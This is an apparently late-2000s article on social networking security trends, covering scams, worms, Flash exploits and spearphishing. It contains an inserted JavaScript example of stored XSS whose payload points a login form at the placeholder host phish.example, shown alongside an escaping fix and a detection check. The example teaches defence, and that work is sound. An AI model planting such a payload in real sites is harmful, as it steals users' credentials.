10 Social Networking Security Trends To Watch
MySpace. Facebook. LinkedIn. Orkut. Who doesn't have a profile on at least one of these sites these days? The explosion of social networking has reinvented communication as we know it, creating new opportunities to develop friendships, romances and business contacts all over the world -- a fact that has not gone unnoticed by malware authors and organized crime.
"Things are happening at such a rapid rate, it's hard to slow that momentum," said Dan Hubbard, senior director, security and technology research, for Websense. "And because they're investing so much money in it, it's very difficult to insert security into that paradigm."
"The attackers understand that this is going on and are gravitating toward that," he added.
In a Web 2.0 world, social networking can turn into a security nightmare when hackers exploit users and steal information for profit. As a result, businesses and individuals alike will have to strike a balance, and find new ways to achieve their objectives while staying safe on the Internet.
Here's a look at some of the things experts say we can expect to see more of in the world of Web 2.0 social networking.
Like the Nigerian bank scam, this one is not going away any time soon.
Spammers who are getting the door slammed in their faces by e-mail spam filters have found new ways to reach users through social networking sites, especially in the workplace. Experts say that spam is more profitable than ever.
Experts say that 419 scams, named for the section of the Nigerian penal code that covers fraud, which used to flood employee e-mail inboxes, now target LinkedIn user profiles. And more attackers will target LinkedIn to reach corporate accounts and intellectual property.
A recent phish, detected by researchers at SophosLabs, claimed to come from a 22-year-old woman living in the Ivory Coast who had inherited $6.5 million after her father passed away and requested a safe place (presumably your bank account) for the money to be deposited.
Does anybody actually believe this stuff anymore, you ask. The good news is that many users are already wise to the ways of Nigerian bank scams. The bad news is that some people actually still fall for them.
It's no secret that the more functionality an application acquires, the more susceptible it is to security threats. As social networking sites encourage users to build add-ons for their network, users will be opening themselves up to exploits of vulnerabilities in third-party applications. Consequently, users will increasingly be exposed to things like buffer overflow vulnerabilities in image uploaders, which are typically hosted by third parties.
"The more function an application has, the less secure it tends to be," said Roger Thompson, chief research officer for AVG. "There are simply more opportunities for things to go wrong."
Perhaps nothing is more ironic than pesky banner ads claiming that your site is hosting every kind of virus known to man and then offering to clean it up -- for a small fee, of course. As more social networking users fear malware on their computers, they become bigger targets for this kind of pop-up adware, which tricks them into downloading fake anti-virus cleaners that are benign at best and destructive at worst. The irony, of course, is that this kind of adware does the very thing it claims to prevent.
It's social networking at its finest. Experts say social networking users can expect more threats to travel virally -- what infects one person will then infect everyone on his or her friends list.
One recent example was the Orkut worm, in which a prankster spread a spam message to almost 400,000 Brazilians with profiles on the site. However, experts say that other rapid, self-replicating viruses will likely be more malicious, designed to steal or delete users' personal information, such as date of birth and passwords. That data can then be sold in numerous black market economies or used to acquire credit card and bank information. Often the same login credentials used on Facebook and MySpace are also used to access banking and other sensitive accounts.
In a recent attack, millions of Facebook users were left exposed to a cross-site scripting vulnerability affecting the user interface of the site's Job page. Among other things, the vulnerability gave attackers the ability to install malicious software as well as trick users into handing over their credentials through fake logins. The social networking site plugged the hole May 23.
The takeaway is that the same threats plaguing Web 2.0 are amplified on social networking sites. Why? Because these sites rely on the prolific and rapid spread of information between users. And unlike other pages, malicious software is bound to be exposed to a high volume of people on these sites.
That said, it's safe to say that users can expect more than a poke once these vulnerabilities are found by attackers. Reflecting the growing Web 2.0 threat, attackers will continue to find and exploit cross-site scripting vulnerabilities on social networking sites. Once a hole is exploited, users will generally receive malicious downloaders, often unbeknownst to them, that install information-stealing code or keystroke loggers.
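The Facebook hole above is the classic shape of a social networking XSS: a profile or job field that the site renders without escaping, so an attacker's markup runs in every viewer's session. The example below is added here for illustration and is not code from the article or from any site it names; the profile record, the attacker host phish.example and the rendering functions are all constructed. It shows the vulnerable rendering beside the escaped version, with the payload doing what the article describes (turning the real login form into a fake one), and a check that flags inline event handlers in rendered output.

```javascript
// Added example (not from the article): a stored XSS in a profile field beside the
// escaped rendering that closes it. All data here is constructed for illustration.

// Payload as an attacker would save it in an "about me" field. If the page renders it
// unescaped, the onerror handler fires in every viewer's browser and points the site's
// login form at the attacker's server, turning the real page into a credential phish.
// phish.example is a placeholder host, not a real one.
const attackerProfile = {
  name: "Alice",
  about: '<img src=x onerror="document.forms[0].action=\'https://phish.example/login\'">',
};

// Vulnerable rendering: untrusted text is concatenated straight into markup.
function renderProfileUnsafe(profile) {
  return `<div class="about">${profile.about}</div>`;
}

// Fix: HTML-escape every untrusted field at the point it enters markup.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

function renderProfileSafe(profile) {
  return `<div class="about">${escapeHtml(profile.about)}</div>`;
}

// Check usable in a unit test or a response-scanning proxy: does any element in the
// rendered fragment carry an inline event handler (onerror=, onload=, ...)? It looks
// only inside real tags, so escaped text such as "&lt;img ... onerror=" does not
// trigger it. This is a regression check for this bug class, not a sanitizer.
function hasInlineHandler(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.some((tag) => /\son\w+\s*=/i.test(tag));
}

// Stand-alone demonstration.
console.log(renderProfileUnsafe(attackerProfile)); // handler survives into the page
console.log(renderProfileSafe(attackerProfile));   // rendered as inert text
console.log(
  hasInlineHandler(renderProfileUnsafe(attackerProfile)), // true
  hasInlineHandler(renderProfileSafe(attackerProfile)),   // false
);
```

Escaping at output time is the fix that matters; filtering on input is what the sites of the period relied on, and every worm of the era (Samy's MySpace worm included) got past an input filter by encoding the payload differently. The same escaping rule applies to any other user-supplied string the page echoes, including the name field left harmless in this example.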
It's the beauty of Web 2.0. There are more attacks on Flash now than ever before. Rich-client runtimes such as Adobe AIR and Microsoft Silverlight, which let the browser do more, also increase the attack surface.
Naturally, the prolific use of Flash is one of the developments that makes Facebook and MySpace so lucrative to attackers. As anyone with a profile knows, these technologies are extremely pervasive, as well as fun, when doing social networking. Unfortunately, a recent exploit against Adobe Flash has become a huge security threat. Experts say that so far hundreds of thousands of Web sites have been compromised, including thousands of social networking pages, as a result of the Flash exploit loose in the wild.
As companies restrict access to social networking sites, the individual user will become the target of highly targeted and personalized spearphishing attacks. These attacks could come in the form of spoofed pages, or simply an unknown user inviting someone to join their friend network.
It won't be hard. After all, a lot of your information, from where you spent your last vacation to your childhood pet, is probably already somewhere on your profile. Often, attackers will spoof or create a profile that appears legitimate, then social engineer a message to entice the user to click in lots of places. Plus, experts say that users are often more willing to click on unknown links or surrender personal information because they're on a trusted medium that encourages the unrestricted sharing of information.
"There's a huge problem of users using information in an unsafe way and sharing social information without thinking who could possibly be looking," said Graham Cluley, senior security consultant for Sophos. "If you make up a mother's maiden name, it isn't a matter of public record. There's no reason to display it for all and sundry to see."
With increased mobility, companies are also moving to become more flexible regarding users' rights to access their social networking pages.
This creates problems because it opens up completely new threat vectors. So don't be surprised if you see companies adopting policies that cover social networking etiquette and safety. In addition, companies will also start to crack down on usage of these sites, or implement technology to limit how long you can be chatting with your former college roommate on Facebook.
"There are so many companies that have presence within those pages. Now companies are starting to create flexible policies and open those things up," said Hubbard of Websense. "Like anything there's user education, policies and enforcement. You have to have the technology to back these things up."
When one door closes another opens.
This tried-and-true adage has never rung more true than with social networking. Attackers frustrated by their inability to enter corporate networks because of sophisticated controls now have a whole new point of entry with LinkedIn, which lets them harvest personal and professional information and spoof employee profiles.
Plus, it's no secret that attackers follow the money. This networking site aimed at professionals also opens up a whole new attack vector for organized crime intent on pilfering intellectual property and corporate information, as well as the credit card and Social Security numbers typically used in identity theft.
Reflecting current cyber crime trends, experts say that attacks on social networking sites will increasingly become more financially driven.
Until recently, attacks like the Samy worm on MySpace simply shut down sites and impeded traffic. However, soon similar attacks will wreak havoc on users' bank accounts as attacks become more complex and organized. This also means that sites like Facebook, which touts a more professional, white-collar user base, as well as professional networking sites like LinkedIn, will increasingly become targets for organized crime.
"The types of attacks we've already seen, we'll see more of. They'll be better targeted toward monetization," said Brian Chess, founder and chief scientist for Fortify Software. "Along those same lines, having all of your information all there on a site that isn't controlled by users and whose security practices aren't paramount, isn't always the best deal."
While experts say that they can't predict the future, it's likely that social networking sites like MySpace and Facebook will start taking more responsibility regarding their security practices -- especially if users significantly change their behavior or avoid logging on altogether.
"Individuals have a tough time making decisions about security," said Chess, "but when they do, they can be really fickle about it."